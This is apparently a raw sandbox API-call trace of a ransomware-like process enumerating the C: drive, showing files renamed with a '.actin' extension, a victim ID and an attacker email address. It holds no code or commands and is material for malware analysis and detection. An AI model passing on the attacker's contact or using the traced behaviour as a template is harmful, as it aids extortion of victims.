hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x457fb78, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0135.264] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x457fb78, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0135.264] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84bc7721, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x84bc7721, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x84bc7721, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xf2, dwReserved0=0x457fb78, dwReserved1=0x0, cFileName="BOOTNXT.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="BOOTNX~1.ACT")) returned 1 [0135.264] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x84bc7721, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x84bc7721, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x84bed9ff, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x2102, dwReserved0=0x457fb78, dwReserved1=0x0, cFileName="BOOTSECT.BAK.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="BOOTSE~1.ACT")) returned 1 [0135.264] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0135.264] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0135.264] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf0fd07c9, ftLastWriteTime.dwHighDateTime=0x1d53297, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0135.264] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0x85a620f7, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x85a620f7, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0135.264] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xf2d6e7f9, ftLastWriteTime.dwHighDateTime=0x1d53297, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0135.264] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0135.264] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x685aef98, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x685aef98, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0135.265] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7511354, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe7511354, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0135.265] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0135.265] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28e9c3a2, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1044dfc5, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x1044dfc5, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0135.265] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6ead2556, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6ead2556, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xf2d6e7f9, ftLastWriteTime.dwHighDateTime=0x1d53297, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0135.265] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x6e16f135, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0xb1ff7ba5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xb1ff7ba5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0135.265] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0135.265] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0135.265] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 1 [0135.265] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 0 [0135.265] FindClose (in: hFindFile=0x1327498 | out: hFindFile=0x1327498) returned 1 [0135.265] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4361670 | out: hHeap=0x2cb0000) returned 1 [0135.266] SetEvent (hEvent=0x4e8) returned 1 [0135.266] SetEvent (hEvent=0x4e4) returned 1 [0135.266] SetEvent (hEvent=0x4ec) returned 1 [0135.277] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0xffffffff) returned 0x0 [0135.277] SetEvent (hEvent=0x4e8) returned 1 [0135.277] SetEvent (hEvent=0x4e4) returned 1 [0135.277] SetEvent (hEvent=0x4ec) returned 1 [0135.277] WaitForMultipleObjects (nCount=0x2, lpHandles=0x457fbd4*=0x4f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0135.277] CloseHandle (hObject=0x4f4) returned 1 [0135.277] CloseHandle (hObject=0x4f0) returned 1 [0135.278] CloseHandle (hObject=0x4e4) returned 1 [0135.278] CloseHandle (hObject=0x4e8) returned 1 [0135.278] CloseHandle (hObject=0x4ec) returned 1 [0135.278] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351668 | out: hHeap=0x2cb0000) returned 1 [0135.278] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1408 | out: hHeap=0x2cb0000) returned 1 [0135.278] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf98 | out: hHeap=0x2cb0000) returned 1 [0135.279] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0135.279] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4351208 | out: hHeap=0x2cb0000) returned 1 [0135.279] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12d0 | out: hHeap=0x2cb0000) returned 1 [0135.279] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4371678 | out: hHeap=0x2cb0000) returned 1 Thread: id = 81 os_tid = 0xf2c [0134.665] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x38) returned 0x2cb4880 [0134.665] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x18) returned 0x2cb48c0 [0134.665] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x4fc [0134.665] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x500 [0134.665] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x504 [0134.665] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43818a0 [0134.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1153a08, lpParameter=0x46bfad0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x508 [0134.666] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1153a08, lpParameter=0x46bfad0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x50c [0134.666] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43918a8 [0134.667] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff718, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x1327598 [0134.717] GetLastError () returned 0x0 [0134.717] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x214) returned 0x43a18b0 [0134.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0134.718] GetCurrentThreadId () returned 0xf2c [0134.718] SetLastError (dwErrCode=0x0) [0134.718] GetLastError () returned 0x0 [0134.718] SetLastError (dwErrCode=0x0) [0134.718] GetLastError () returned 0x0 [0134.718] SetLastError (dwErrCode=0x0) [0134.718] GetLastError () returned 0x0 [0134.718] SetLastError (dwErrCode=0x0) [0134.718] GetLastError () returned 0x0 [0134.718] SetLastError (dwErrCode=0x0) [0134.718] GetLastError () returned 0x0 [0134.718] SetLastError (dwErrCode=0x0) [0134.718] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43a1ad0 [0134.719] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*", lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0x13273d8 [0134.719] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0134.719] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="Logs", cAlternateFileName="")) returned 1 [0134.719] GetLastError () returned 0x0 [0134.719] SetLastError (dwErrCode=0x0) [0134.719] GetLastError () returned 0x0 [0134.719] SetLastError (dwErrCode=0x0) [0134.719] GetLastError () returned 0x0 [0134.719] SetLastError (dwErrCode=0x0) [0134.719] GetLastError () returned 0x0 [0134.719] SetLastError (dwErrCode=0x0) [0134.719] GetLastError () returned 0x0 [0134.719] SetLastError (dwErrCode=0x0) [0134.719] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43b1ad8 [0134.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x13275d8 [0134.721] FindNextFileW (in: hFindFile=0x13275d8, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.721] FindNextFileW (in: hFindFile=0x13275d8, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c30e245, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c30e245, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c334508, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xa7e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DOWNLE~1.ACT")) returned 1 [0134.721] GetLastError () returned 0x0 [0134.721] SetLastError (dwErrCode=0x0) [0134.721] GetLastError () returned 0x0 [0134.721] SetLastError (dwErrCode=0x0) [0134.721] GetLastError () returned 0x0 [0134.721] SetLastError (dwErrCode=0x0) [0134.721] GetLastError () returned 0x0 [0134.721] SetLastError (dwErrCode=0x0) [0134.721] GetLastError () returned 0x0 [0134.721] SetLastError (dwErrCode=0x0) [0134.721] GetLastError () returned 0x0 [0134.721] SetLastError (dwErrCode=0x0) [0134.721] GetLastError () returned 0x0 [0134.721] SetLastError (dwErrCode=0x0) [0134.721] GetLastError () returned 0x0 [0134.721] SetLastError (dwErrCode=0x0) [0134.721] GetLastError () returned 0x0 [0134.721] SetLastError (dwErrCode=0x0) [0134.721] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.722] GetLastError () returned 0x0 [0134.722] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.723] SetLastError (dwErrCode=0x0) [0134.723] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.724] SetLastError (dwErrCode=0x0) [0134.724] GetLastError () returned 0x0 [0134.725] SetLastError (dwErrCode=0x0) [0134.725] GetLastError () returned 0x0 [0134.725] SetLastError (dwErrCode=0x0) [0134.725] FindNextFileW (in: hFindFile=0x13275d8, lpFindFileData=0x46bf33c | out: lpFindFileData=0x46bf33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c334508, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c334508, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c334508, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x18a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="OOBE_2~1.ACT")) returned 1 [0134.725] GetLastError () returned 0x0 [0134.725] SetLastError (dwErrCode=0x0) [0134.725] GetLastError () returned 0x0 [0134.725] SetLastError (dwErrCode=0x0) [0134.725] GetLastError () returned 0x0 [0134.725] SetLastError (dwErrCode=0x0) [0134.725] GetLastError () returned 0x0 [0134.725] SetLastError (dwErrCode=0x0) [0134.725] GetLastError () returned 0x0 [0134.725] SetLastError (dwErrCode=0x0) [0134.725] GetLastError () returned 0x0 [0134.725] SetLastError (dwErrCode=0x0) [0134.725] GetLastError () returned 0x0 [0134.725] SetLastError (dwErrCode=0x0) [0134.725] GetLastError () returned 0x0 [0134.725] SetLastError (dwErrCode=0x0) [0134.725] GetLastError () returned 0x0 [0134.725] SetLastError (dwErrCode=0x0) [0134.725] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.726] GetLastError () returned 0x0 [0134.726] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.727] SetLastError (dwErrCode=0x0) [0134.727] GetLastError () returned 0x0 [0134.728] SetLastError (dwErrCode=0x0) [0134.728] GetLastError () returned 0x0 [0134.728] SetLastError (dwErrCode=0x0) [0134.728] GetLastError () returned 0x0 [0134.728] SetLastError 